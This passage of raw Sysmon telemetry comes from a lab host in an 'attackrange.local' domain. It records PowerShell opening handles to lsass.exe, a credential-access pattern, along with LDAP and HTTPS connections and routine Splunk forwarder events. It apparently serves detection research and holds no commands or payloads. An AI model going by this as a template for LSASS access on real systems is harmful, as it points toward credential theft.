22:03:22.528{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.522{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.522{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.490{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.490{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.490{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B4A74C0EF2672E22EEFF46CB2B8BF13,SHA256=FEE5CFD040B7072A83D22B7250DE327B9817C756696338DF6C6236630F040E26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:46.430{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62305-false10.0.1.12-8000- 23542300x800000000000000035129590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:23.627{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FC53FE555F469F1F6515E4C06E6DC2E5,SHA256=EC970F4917334168470648615A8D1162938360AA13BFF09553261962DCB15BE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:23.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEC9715D3CEEBA052584C715182723A6,SHA256=FF111671EC0CBBFB37EE9A402C66C14596C92C627B0A3D3B51663216CA8FF81F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:24.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13BBE70E4801E6944EB78F9C15B6FE7,SHA256=04C8C7595589D88159BDF11EF88A56F1CE83AA54A88AFBF72A38FB5A7B413089,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.991{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62310-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.723{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62309-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62308-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.686{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62307-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:48.661{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62306-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:25.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB599198507874947449F2603D13ADA6,SHA256=086FE8CDAE8ED53E10CF10F7501CC1B299BBC9FAFE6AB6F8A5335A459768E498,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-84AE-613A-0397-03000000C801}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-84AE-613A-0397-03000000C801}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.901{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-84AE-613A-0397-03000000C801}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.886{B81B27B7-84AE-613A-0397-03000000C801}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=877C6BD19A961901AC2A1AE73CEC2A0B,SHA256=AEA4FE206E1927D577AEDAC90F10A40E8C3672A1989E07B7974EBA202D9F8F6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BCF871D70FDC035DB56D566D89686AE,SHA256=9EE77551219360B6FBC5AF3A6B1B6292EA67D0910412AEC4501A72904587F699,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFFD2EDB6C446B82F814C293E6FE0EA2,SHA256=97014DAED761BCB347F010747872B6EE5B2DB9DE9F7CDA1BF2F32BBCD7DB445E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.622{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D37F0F08B25E774B6F1513E1142B29,SHA256=70452B281386F22280FC7399D860B734C23133078CAB68000AA676693796AC0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-84AF-613A-0497-03000000C801}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-84AF-613A-0497-03000000C801}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.601{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-84AF-613A-0497-03000000C801}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 